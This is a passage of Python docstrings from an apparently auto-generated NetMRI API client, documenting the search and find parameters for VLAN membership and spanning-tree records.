:param StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members.
:type StpForwardDelay: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using.
:type StpHelloTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second.
:type StpHoldTime: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpMaxAge: The maximum age of Spanning Tree Protocol information learned from the network on any port before it is discarded, in units of hundredths of a second. This is the actual value that this bridge is currently using. Empty for non-bridge members.
:type StpMaxAge: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpPriority: The spanning tree protocol priority for this bridge in this VLAN. Empty for non-bridge members.
:type StpPriority: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpProtocolSpecification: The protocol of spanning tree running for this VLAN. Empty for non-bridge members.
:type StpProtocolSpecification: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootCost: The cost of the path to the root bridge as seen from this bridge. Empty for non-bridge members.
:type StpRootCost: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpRootPort: The port number (i.e., the SwitchPortNumber attribute value of the interface) of the port that offers the lowest cost path from this bridge to the root bridge.
:type StpRootPort: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param StpTopChanges: The total number of topology changes detected by this bridge since the last reset. Empty for non-bridge members.
:type StpTopChanges: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VTPDomain: Management domain name if VLAN is VTP managed.
:type VTPDomain: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanID: The internal NetMRI identifier of the VLAN associated with this VLAN membership.
:type VlanID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberChangedCols: The fields that changed between this revision of the record and the previous revision.
:type VlanMemberChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type VlanMemberEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberID: The internal NetMRI identifier for this VLAN membership.
:type VlanMemberID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberStartTime: The starting effective time of this revision of the record.
:type VlanMemberStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanMemberTimestamp: The date and time this record was collected or calculated.
:type VlanMemberTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanName: The name of this VLAN as configured on this device. Empty for non-bridge members.
:type VlanName: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanState: The state of this VLAN on this device. Empty for non-bridge members.
The state 'mtuTooBigForDevice' indicates that this device cannot participate in this VLAN because the VLAN's MTU is larger than the device can support.
The state 'mtuTooBigForTrunk' indicates that while this VLAN's MTU is supported by this device, it is too large for one or more of the device's trunk ports.
:type VlanState: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VlanType: The type of this VLAN (1:ethernet, 2:fddi, 3:tokenRing, 4:fddiNet, 5:trNet, 6:deprecated) as configured on this device. Empty for non-bridge members.
:type VlanType: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the vlan members as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of vlan member methods. The listed methods will be called on each vlan member returned and included in the output. Available methods are: network_id, data_source, device, interface, vlan.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: data_source, device, interface, vlan.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` VlanMemberID
:param sort: The data field(s) to use for sorting the output. Default is VlanMemberID. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each VlanMember. Valid values are VlanMemberID, VlanMemberStartTime, VlanMemberEndTime, VlanMemberChangedCols, VlanMemberTimestamp, DataSourceID, DeviceID, VlanID, InterfaceID, BridgeMemberInd, VlanState, VlanType, VlanName, VTPDomain, RootBridgeAddress, BaseBridgeAddress, BaseNumPorts, StpDesignatedRoot, StpProtocolSpecification, StpPriority, StpTopChanges, StpRootCost, StpRootPort, StpMaxAge, StpHelloTime, StpHoldTime, StpForwardDelay, StpBridgeMaxAge, StpBridgeHelloTime, StpBridgeForwardDelay. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against vlan members, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return vlan_members: An array of the VlanMember objects that match the specified input criteria.
:rtype vlan_members: Array of VlanMember
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available vlan members matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BaseBridgeAddress, BaseNumPorts, BridgeMemberInd, DataSourceID, DeviceID, InterfaceID, RootBridgeAddress, StpBridgeForwardDelay, StpBridgeHelloTime, StpBridgeMaxAge, StpDesignatedRoot, StpForwardDelay, StpHelloTime, StpHoldTime, StpMaxAge, StpPriority, StpProtocolSpecification, StpRootCost, StpRootPort, StpTopChanges, VTPDomain, VlanID, VlanMemberChangedCols, VlanMemberEndTime, VlanMemberID, VlanMemberStartTime, VlanMemberTimestamp, VlanName, VlanState, VlanType.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseBridgeAddress: The operator to apply to the field BaseBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseBridgeAddress: The spanning tree protocol base bridge address of this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseBridgeAddress: If op_BaseBridgeAddress is specified, the field named in this input will be compared to the value in BaseBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_f_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseBridgeAddress: If op_BaseBridgeAddress is specified, this value will be compared to the value in BaseBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseBridgeAddress must be specified if op_BaseBridgeAddress is specified.
:type val_c_BaseBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BaseNumPorts: The operator to apply to the field BaseNumPorts. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BaseNumPorts: The number of ports on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BaseNumPorts: If op_BaseNumPorts is specified, the field named in this input will be compared to the value in BaseNumPorts using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_f_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BaseNumPorts: If op_BaseNumPorts is specified, this value will be compared to the value in BaseNumPorts using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BaseNumPorts must be specified if op_BaseNumPorts is specified.
:type val_c_BaseNumPorts: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BridgeMemberInd: The operator to apply to the field BridgeMemberInd. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BridgeMemberInd: A flag indicating that this VLAN membership record represents a bridge device's configuration entry for the VLAN; that is, that this membership record is for a bridge participating in the VLAN, as opposed to a device attached to an access port. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BridgeMemberInd: If op_BridgeMemberInd is specified, the field named in this input will be compared to the value in BridgeMemberInd using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_f_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BridgeMemberInd: If op_BridgeMemberInd is specified, this value will be compared to the value in BridgeMemberInd using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BridgeMemberInd must be specified if op_BridgeMemberInd is specified.
:type val_c_BridgeMemberInd: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device associated with this VLAN membership. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the switched virtual interface for this VLAN on this device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RootBridgeAddress: The operator to apply to the field RootBridgeAddress. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RootBridgeAddress: The spanning tree protocol root bridge address; this is the designated root with the STP priority portion removed. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RootBridgeAddress: If op_RootBridgeAddress is specified, the field named in this input will be compared to the value in RootBridgeAddress using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_f_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RootBridgeAddress: If op_RootBridgeAddress is specified, this value will be compared to the value in RootBridgeAddress using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RootBridgeAddress must be specified if op_RootBridgeAddress is specified.
:type val_c_RootBridgeAddress: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeForwardDelay: The operator to apply to the field StpBridgeForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeForwardDelay: The value that all bridges use for ForwardDelay when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, the field named in this input will be compared to the value in StpBridgeForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_f_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeForwardDelay: If op_StpBridgeForwardDelay is specified, this value will be compared to the value in StpBridgeForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeForwardDelay must be specified if op_StpBridgeForwardDelay is specified.
:type val_c_StpBridgeForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeHelloTime: The operator to apply to the field StpBridgeHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeHelloTime: The value that all bridges use for HelloTime when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, the field named in this input will be compared to the value in StpBridgeHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_f_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeHelloTime: If op_StpBridgeHelloTime is specified, this value will be compared to the value in StpBridgeHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeHelloTime must be specified if op_StpBridgeHelloTime is specified.
:type val_c_StpBridgeHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpBridgeMaxAge: The operator to apply to the field StpBridgeMaxAge. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpBridgeMaxAge: The value that all bridges use for MaxAge when this bridge is acting as the root. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, the field named in this input will be compared to the value in StpBridgeMaxAge using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_f_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpBridgeMaxAge: If op_StpBridgeMaxAge is specified, this value will be compared to the value in StpBridgeMaxAge using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpBridgeMaxAge must be specified if op_StpBridgeMaxAge is specified.
:type val_c_StpBridgeMaxAge: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpDesignatedRoot: The operator to apply to the field StpDesignatedRoot. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpDesignatedRoot: The bridge identifier for this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpDesignatedRoot: If op_StpDesignatedRoot is specified, the field named in this input will be compared to the value in StpDesignatedRoot using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_f_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpDesignatedRoot: If op_StpDesignatedRoot is specified, this value will be compared to the value in StpDesignatedRoot using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpDesignatedRoot must be specified if op_StpDesignatedRoot is specified.
:type val_c_StpDesignatedRoot: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpForwardDelay: The operator to apply to the field StpForwardDelay. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpForwardDelay: This time value, measured in units of hundredths of a second, controls how fast a port changes its spanning state when moving towards the Forwarding state. The value determines how long the port stays in each of the Listening and Learning states, which precede the Forwarding state. This value is also used when a topology change has been detected and is underway, to age all dynamic entries in the Forwarding Database. This is the value currently in use on this bridge. Empty for non-bridge members. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpForwardDelay: If op_StpForwardDelay is specified, the field named in this input will be compared to the value in StpForwardDelay using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_f_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpForwardDelay: If op_StpForwardDelay is specified, this value will be compared to the value in StpForwardDelay using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpForwardDelay must be specified if op_StpForwardDelay is specified.
:type val_c_StpForwardDelay: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHelloTime: The operator to apply to the field StpHelloTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHelloTime: The amount of time between the transmission of Configuration bridge PDUs by this node on any port when it is the root of the spanning tree, or trying to become so, in units of hundredths of a second. This is the actual value that this bridge is currently using. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHelloTime: If op_StpHelloTime is specified, the field named in this input will be compared to the value in StpHelloTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_f_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_StpHelloTime: If op_StpHelloTime is specified, this value will be compared to the value in StpHelloTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_StpHelloTime must be specified if op_StpHelloTime is specified.
:type val_c_StpHelloTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_StpHoldTime: The operator to apply to the field StpHoldTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. StpHoldTime: This time value determines the interval length during which no more than two Configuration bridge PDUs shall be transmitted by this node, in units of hundredths of a second. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_StpHoldTime: If op_StpHoldTime is specified, the field named in this input will be compared to the value in StpHoldTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_StpHoldTime must be specified if op_StpHoldTime is specified.
:type val_f_StpHoldTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
